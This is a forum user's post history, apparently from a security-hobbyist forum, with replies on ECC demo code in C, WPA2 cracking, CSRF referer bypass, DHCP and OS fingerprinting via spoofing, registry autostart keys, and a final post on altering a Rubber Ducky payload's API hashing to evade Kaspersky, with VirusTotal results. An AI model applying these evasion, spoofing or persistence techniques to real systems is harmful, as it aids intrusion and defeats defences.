fugu
-
Posts
197 -
Joined
-
Last visited
-
Days Won
6
Posts posted by fugu
-
-
I know a really ugly way to do this, it kinda works but is going to throw some errors in the process. you create a .bat file like auto.bat:
#/bin/sh goto label0 ./MacOSX_program exit 0 label0: .\Windows_program.exeThe windows OS will see that the filename has a .bat extension. I doesn't know what #/bin/sh means so it throws an error, but continues on. It follows the goto the label0 and then runs the Windows_program.exe.
The mac OS will ignore the .bat extension, but read #/bin/sh as a shell script. it will error on the goto, but continue on to run the MacOSX_program
-
22 hours ago, kerravon said:
didnt is see somewhere in the distant past rainbow tables created to do just this?
maybe I was dreaming again, old age does that to you.A while back I was looking into creating a program that would create a rainbowtables-like set of tables, that would handle WPA2/HMAC/SHA1 and I probably could have started making one, but the major problem with it is the keyspace size is way too large. This is referred to as Time Memory Trade Off, so the less time you want it to take, the more memory your tables are going to take up on the hard drive. For WPA2 the keyspace is going to be based on the PASSPHRASE that was used, plus SSID, plus a random number called the ANONCE, plus a random number called the SNONCE. even if you knew what the passphrase was, and you created a table for ssid and the 2 nonces, it would be really large. My thinking is that it would probably be impractical to create a full set tmto tables to completely crack wpa2.
-
In many of the documents that I've been looking over, they talk about many of these things in terms of the mathematics, and I tend to see the same single letter variables being used over and over again. Some references will use different letters so its not always constant, but I was primarily going off of the site http://www.johannes-bauer.com/compsci/ecc/ for a majority of the concepts. The functions for point addition, point doubling, and scalar multiplication were pulled directly from "Implementation of Elliptic Curve Cryptography in C" by Kuldeep Bhardwaj and Sanjay Chaudhary, appendix A.
-
So this is a little demo I've been working on that plays around with ECC Point Mathematics & encryption. Many of the demos I've found have been not functional from beginning to end, and although this is not going to be a secure version of ECC, it does demo some of the basic properties of it. I'm using pieces of existing code, along with my own to get it working.
Individual ECC curve properties as well as the public key/private key pair can be created with openssl:
CRYPTNAME=secp192k1 && openssl ecparam -name $CRYPTNAME -out $CRYPTNAME.pem && openssl ecparam -in $CRYPTNAME.pem -noout -text -C && openssl ecparam -in $CRYPTNAME.pem -genkey -noout -out $CRYPTNAME-key.pem && openssl ec -in $CRYPTNAME-key.pem -noout -text && rm -f $CRYPTNAME.pem $CRYPTNAME-key.pem
In real ECIES, a common point is derived on both the senders end, as well as the receivers end, which is used to agree upon symmetric key. Normally something like AES is used to encrypt the message with this key, but I'm just xor'ing the message to keep the example small.
Here it is:
#include<stdio.h> #include<stdlib.h> #include<string.h> #include<gmp.h> #include<time.h> struct Point{ mpz_t x; mpz_t y; }; struct Elliptic_Curve{ mpz_t a; //y^2 = x^3 + a*x + b mpz_t b; mpz_t p; mpz_t n; //Order struct Point G; //Base Point mpz_t h; //Cofactor }; void Point_Addition(struct Elliptic_Curve EC, struct Point P,struct Point Q, struct Point *R); void Point_Doubling(struct Elliptic_Curve EC, struct Point P,struct Point *R); void Scalar_Multiplication(struct Elliptic_Curve EC, mpz_t m, struct Point P, struct Point *R); int main(int argc, char * argv[]){ srand(time(NULL)); //not crypto secure struct Elliptic_Curve secp192k1; mpz_init(secp192k1.a); mpz_init(secp192k1.b); mpz_init(secp192k1.p); mpz_init(secp192k1.n); mpz_init(secp192k1.G.x); mpz_init(secp192k1.G.y); mpz_init(secp192k1.h); mpz_set_str(secp192k1.a,"0", 16); //Elliptic Curve P-192 mpz_set_str(secp192k1.b,"3", 16); mpz_set_str(secp192k1.p,"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFEE37", 16); mpz_set_str(secp192k1.n,"FFFFFFFFFFFFFFFFFFFFFFFE26F2FC170F69466A74DEFD8D", 16); mpz_set_str(secp192k1.G.x,"DB4FF10EC057E9AE26B07D0280B7F4341DA5D1B1EAE06C7D", 16); mpz_set_str(secp192k1.G.y,"9B2F2F6D9C5628A7844163D015BE86344082AA88D95E2F9D", 16); mpz_set_str(secp192k1.h,"1", 16); mpz_t da; //priv struct Point Qa; //pub mpz_init(da); mpz_init(Qa.x); mpz_init(Qa.y); mpz_set_str(da, "e03a7a761dc3f4b5ff363906af1a1bfb97e1cbfc837834ed", 16); //private key, a random integer from "0" to "n" mpz_set_str(Qa.x,"8d4af03e8368921895af8c777fac221439604811d2359249", 16); //public key x mpz_set_str(Qa.y,"6f35647c10df80325be5cc48c5a2a218525db549d3d5839c", 16); //public key y mpz_t encoded_message; mpz_init(encoded_message); mpz_set_ui(encoded_message,0); unsigned char ary[] = "Hello World! 1234567890"; mpz_import(encoded_message, sizeof(ary), 1, sizeof(ary[0]), 1, 0, (const void *)ary); printf("#############################################################################\nary = %s\n", ary); struct Point R; mpz_init(R.x); mpz_init(R.y); struct Point S; mpz_init(S.x); mpz_init(S.y); mpz_t r; mpz_init(r); gmp_randstate_t state; gmp_randinit_mt(state); gmp_randseed_ui(state,rand()); mpz_urandomm(r,state,secp192k1.n); Scalar_Multiplication(secp192k1, r, secp192k1.G, &R); //R = r*G Scalar_Multiplication(secp192k1, r, Qa, &S); //S = r*Qa mpz_t e; mpz_init(e); mpz_xor(e,S.x,S.y); //My simplifed variant of the symmetric encryption part, not standard for real ECIES, probably insecure mpz_xor(e,e,encoded_message); //ciphertext = S.x ^ S.y ^ cleartext gmp_printf("Qa.x = %Zx //Point Qa is the PUBLIC_KEY\nQa.y = %Zx\n", Qa.x, Qa.y); gmp_printf("Ciphertext Message => Rx = %Zx //Point R is the CHOOSEN_POINT\nCiphertext Message => Ry = %Zx\n", R.x, R.y); gmp_printf("Ciphertext Message => e = %Zx\n", e); //Only Rx, Ry, and e get sent over the wire printf("Decrypt 'e' From da && R... //da is the PRIVATE_KEY\n"); struct Point newS; mpz_init(newS.x); mpz_init(newS.y); Scalar_Multiplication(secp192k1, da, R, &newS); mpz_t decoded_message; mpz_init(decoded_message); mpz_xor(decoded_message,newS.x,newS.y); mpz_xor(decoded_message,decoded_message,e); unsigned char *result = (unsigned char *)malloc(sizeof(unsigned char)*mpz_sizeinbase(decoded_message,8)); mpz_export(result, NULL, 1, sizeof(result[0]), 1, 0, decoded_message); printf("dec = %s\n\n", result); mpz_clear(secp192k1.a); mpz_clear(secp192k1.b); mpz_clear(secp192k1.p); mpz_clear(secp192k1.n); mpz_clear(secp192k1.G.x); mpz_clear(secp192k1.G.y); mpz_clear(secp192k1.h); mpz_clear(R.x); mpz_clear(R.y); mpz_clear(S.x); mpz_clear(S.y); mpz_clear(newS.x); mpz_clear(newS.y); mpz_clear(da); mpz_clear(e); mpz_clear(r); mpz_clear(encoded_message); mpz_clear(decoded_message); mpz_clear(Qa.x); mpz_clear(Qa.y); return 0; } void Point_Addition(struct Elliptic_Curve EC, struct Point P,struct Point Q,struct Point *R){ mpz_mod(P.x,P.x,EC.p); mpz_mod(P.y,P.y,EC.p); mpz_mod(Q.x,Q.x,EC.p); mpz_mod(Q.y,Q.y,EC.p); mpz_t temp,slope; mpz_init(temp); mpz_init_set_ui(slope,0); if(mpz_cmp_ui(P.x,0)==0 && mpz_cmp_ui(P.y,0)==0){ mpz_set(R->x,Q.x); mpz_set(R->y,Q.y); return; } if(mpz_cmp_ui(Q.x,0)==0 && mpz_cmp_ui(Q.y,0)==0){ mpz_set(R->x,P.x); mpz_set(R->y,P.y); return; } if(mpz_cmp_ui(Q.y,0)!=0){ mpz_sub(temp,EC.p,Q.y); mpz_mod(temp,temp,EC.p); }else mpz_set_ui(temp,0); if(mpz_cmp(P.y,temp)==0 && mpz_cmp(P.x,Q.x)==0){ mpz_set_ui(R->x,0); mpz_set_ui(R->y,0); return; } if(mpz_cmp(P.x,Q.x)==0 && mpz_cmp(P.y,Q.y)==0){ Point_Doubling(EC,P,R); return; }else{ mpz_sub(temp,P.x,Q.x); mpz_mod(temp,temp,EC.p); mpz_invert(temp,temp,EC.p); mpz_sub(slope,P.y,Q.y); mpz_mul(slope,slope,temp); mpz_mod(slope,slope,EC.p); mpz_mul(R->x,slope,slope); mpz_sub(R->x,R->x,P.x); mpz_sub(R->x,R->x,Q.x); mpz_mod(R->x,R->x,EC.p); mpz_sub(temp,P.x,R->x); mpz_mul(R->y,slope,temp); mpz_sub(R->y,R->y,P.y); mpz_mod(R->y,R->y,EC.p); return; } } void Point_Doubling(struct Elliptic_Curve EC, struct Point P,struct Point *R){ mpz_t slope,temp; mpz_init(temp); mpz_init(slope); if(mpz_cmp_ui(P.y,0)!=0){ mpz_mul_ui(temp,P.y,2); mpz_invert(temp,temp,EC.p); mpz_mul(slope,P.x,P.x); mpz_mul_ui(slope,slope,3); mpz_add(slope,slope,EC.a); mpz_mul(slope,slope,temp); mpz_mod(slope,slope,EC.p); mpz_mul(R->x,slope,slope); mpz_sub(R->x,R->x,P.x); mpz_sub(R->x,R->x,P.x); mpz_mod(R->x,R->x,EC.p); mpz_sub(temp,P.x,R->x); mpz_mul(R->y,slope,temp); mpz_sub(R->y,R->y,P.y); mpz_mod(R->y,R->y,EC.p); }else{ mpz_set_ui(R->x,0); mpz_set_ui(R->y,0); } } void Scalar_Multiplication(struct Elliptic_Curve EC, mpz_t m, struct Point P, struct Point *R){ struct Point Q,T; mpz_init(Q.x); mpz_init(Q.y); mpz_init(T.x); mpz_init(T.y); long no_of_bits,loop; no_of_bits=mpz_sizeinbase(m,2); mpz_set_ui(R->x,0); mpz_set_ui(R->y,0); if(mpz_cmp_ui(m,0)==0) return; mpz_set(Q.x,P.x); mpz_set(Q.y,P.y); if(mpz_tstbit(m,0)==1){ mpz_set(R->x,P.x); mpz_set(R->y,P.y); } for(loop=1;loop<no_of_bits;loop++){ mpz_set_ui(T.x,0); mpz_set_ui(T.y,0); Point_Doubling(EC,Q,&T); mpz_set(Q.x,T.x); mpz_set(Q.y,T.y); mpz_set(T.x,R->x); mpz_set(T.y,R->y); if(mpz_tstbit(m,loop)) Point_Addition(EC,T,Q,R); } }
-
You can also try
powershell.exe -command "Write-Host (New-Object System.Net.WebClient).DownloadString(\"http://diagnostic.opendns.com/myip\")"
-
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
QuoteChecking The Referer Header
If the Origin header is not present, verify the hostname in the Referer header matches the site's origin. Checking the referer is a commonly used method of preventing CSRF on embedded network devices because it does not require a per-user state. This makes a referer a useful method of CSRF prevention when memory is scarce or server-side state doesn't exist. This method of CSRF mitigation is also commonly used with unauthenticated requests, such as requests made prior to establishing a session state which is required to keep track of a synchronization token.
In both cases, just make sure your origin check is strong. For example, if your site is "site.com" make sure "site.com.attacker.com" doesn't pass your origin check (i.e., match through the trailing / after the origin to make sure you are matching against the entire origin).
I think this is the solution to that challenge, if I'm not mistaken.
-
doesn't ereg and eregi use regular expressions? If you have control of what will end up in the referrer field, couldn't you try and make the referrer a very widely encompassing regex like .* or something? I'm not sure the * is valid in the hostname location but maybe you can figure something out.
-
The only way to know for sure what your external ip is (for the network your connected up to), is to send out a request and have the destination server tell you what your ip is. This has a lot of legitimate uses; NoScript's ABE uses this to help protect your browser. You might consider looking at dynamic dns as a solution to what your trying to do. There is software that is used on desktop machines to keep the external ip address of your home network associated with a dns entry, so that if you ever want to log into your home network when your away, you can just use your own dns to do so.
-
i don't know if you have the ability to modify the code, but if you can add
echo "<pre><code>"; var_dump($_SERVER); echo "</code></pre>";
will let you examine all the various header entries that are stored in the $_SERVER variable during your request.
-
Implementation of Elliptic Curve Cryptography in 'C'
http://www.researchtrend.net/ijet32/6%20KULDEEP%20BHARDWAJ.pdf
Elliptic Curve Cryptography: Algorithms and Implementation Analysis over Coordinate Systems
http://www.researchgate.net/profile/Iskandar_Setiadi/publication/268688957_Elliptic_Curve_Cryptography_Algorithms_and_Implementation_Analysis_over_Coordinate_Systems/links/5474337a0cf29afed60f6340.pdf -
-
On 6/9/2016 at 11:22 AM, AllCNICoFounder said:
Thank you so much for this <:
No problem:) There is a slightly better version of this at the Exploit DB www.exploit-db.com under shellcodes, which doesn't spam the log file or bog down the CPU.
-
I've been looking for a new debugger for a while now. My previous debugger of choice for Windows was OllyDbg, which is the very first debugger I started with, but it's so outdated, and when I hop OS's (non-windows) it is not compatible. In Linux I tend to just use gdb, but its more designed for the command line, and it's nice to be able to look at the disassembled code, registers and stack all at the same time; imo it makes it easier to see whats going on. The debugger that looks most promising (to me) is IDA Pro, its available in multiple architectures, and i think it can even debug remotely to android devices. but its not foss, which is a bit of a let down. IDA Pro seem to ultimately be the way to go, but I was wondering if anyone knew of any open source alternatives to a multi-platform debugger?
-
is it possible that someone nearby is using airbase-ng to create fake ap's?
-
Thats a great find! Thank you for the share!http://securityxploded.com/backtrackregistry.php
And here is a tutorial showing how to bootup kali live usb and edit the windows registry...
Run clamAV when u have kali running on the windows hard drive via command line... its possible the av will capture tools on the kali hd and lock them up...
-
-
I agree, I think it should just beI don't have a ducky, but what's wrong with just "!"?
STRING !
-
I didn't know about RunServices, I never thought of trying that entry. I always would just play about with HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to get stuff to start when windows starts
-
if you have access to a computer with nmap:
$ sudo nmap -sU -n --script=dhcp-discover -p 67 192.168.2.0/24 $ sudo nmap -sU -n --script=dhcp-discover -p 67 172.16.42.0/24
I think this will display info about any dhcp servers on the 2 networks 192.168.2.0-255 and 172.16.42.0-255Its possible that these 2 network ranges overlap each other
Edit: changed to new ip ranges
-
That's good to know. The way I had read the description it sounded like it might have the capability of logging bytes of data traveling over the wire. Now that I reread it, I can see that its not what it does, that its able to record power data. Thank you.It's not! It's a USB power meter.
-
Automatic IP designation is usually done via Dynamic Host Configuration Protocol (DHCP), for computers in general. There might be several things that could be going wrong. One thing I can think of is that you have 2 dhcp servers on you network are trying to dish out info and they are competing. Another possibility is there just happens to be another open wifi network near by that you are sometimes connecting to instead of your pineapple.
-
Just wanted to add a plug for the portpilot:http://hakshop.myshopify.com/products/portpilotin the hakshop. although I have not used it personally, It is a usb data logger, which you might consider if wireshark doesn't work for you. -
From what I understand about windows firewall, it does a great job at ingress filtering of data packets coming in, but you might be able to get some data about the OS from the packets leaving the vm. p0f will fingerprint the OS if you can look at the TCP-SYN packets leaving the computer. There are probably several ways you can get some traffic from it to start sniffing for a syn packet. arpspoof is what first comes to mind. you could do dns spoofing, and because your on the same subnet, dhcp spoofing would be really easy. I'm sure there are other ways too, those were just off the top of my head.
-
can you show virus scan results?
SHA256: 525dd24ac394e238404fe08504891bab80168c80fba1e396827a8683b697845c File name: test.exe Detection ratio: 5 / 56 Analysis date: 2016-04-27 04:09:53 UTC ( 1 minute ago ) 0 0 Analysis File detail Additional information Comments Votes Behavioural information Antivirus Result Update Avira (no cloud) TR/Crypt.XPACK.Gen 20160426 NANO-Antivirus Virus.Win32.Gen.ccmw 20160427 Qihoo-360 HEUR/QVM20.1.0000.Malware.Gen 20160427 Sophos Mal/EncPk-ND 20160427 VBA32 Heur.Trojan.Hlux 20160425 ALYac 20160427 AVG 20160427 AVware 20160427 Ad-Aware 20160427 AegisLab 20160426 AhnLab-V3 20160426 Alibaba 20160426 Antiy-AVL 20160427 Arcabit 20160427 Avast 20160427 Baidu 20160426 Baidu-International 20160426 BitDefender 20160427 Bkav 20160427 CAT-QuickHeal 20160427 CMC 20160425 ClamAV 20160426 Comodo 20160426 Cyren 20160427 DrWeb 20160427 ESET-NOD32 20160427 Emsisoft 20160427 F-Prot 20160427 F-Secure 20160427 Fortinet 20160425 GData 20160427 Ikarus 20160426 Jiangmin 20160427 K7AntiVirus 20160426 K7GW 20160427 Kaspersky 20160427 Kingsoft 20160427 Malwarebytes 20160427 McAfee 20160427 McAfee-GW-Edition 20160427 eScan 20160427 Microsoft 20160427 Panda 20160426 Rising 20160427 SUPERAntiSpyware 20160427 Symantec 20160427 Tencent 20160427 TheHacker 20160426 TrendMicro 20160427 TrendMicro-HouseCall 20160427 VIPRE 20160427 ViRobot 20160427 Yandex 20160426 Zillya 20160426 Zoner 20160427 nProtect 20160426
Kaspersky blocks my ducky powershell payloads
in Classic USB Rubber Ducky
Posted
this is untested, but I rewrote the hashing that your exploit is using. instead of the ror13 hash that was being used, I changed it to ror12. on virustotal now, kaspersky is unable to detect it, but it could be cause I created a bug that I don't know about in the process, like I said, i haven't tested it.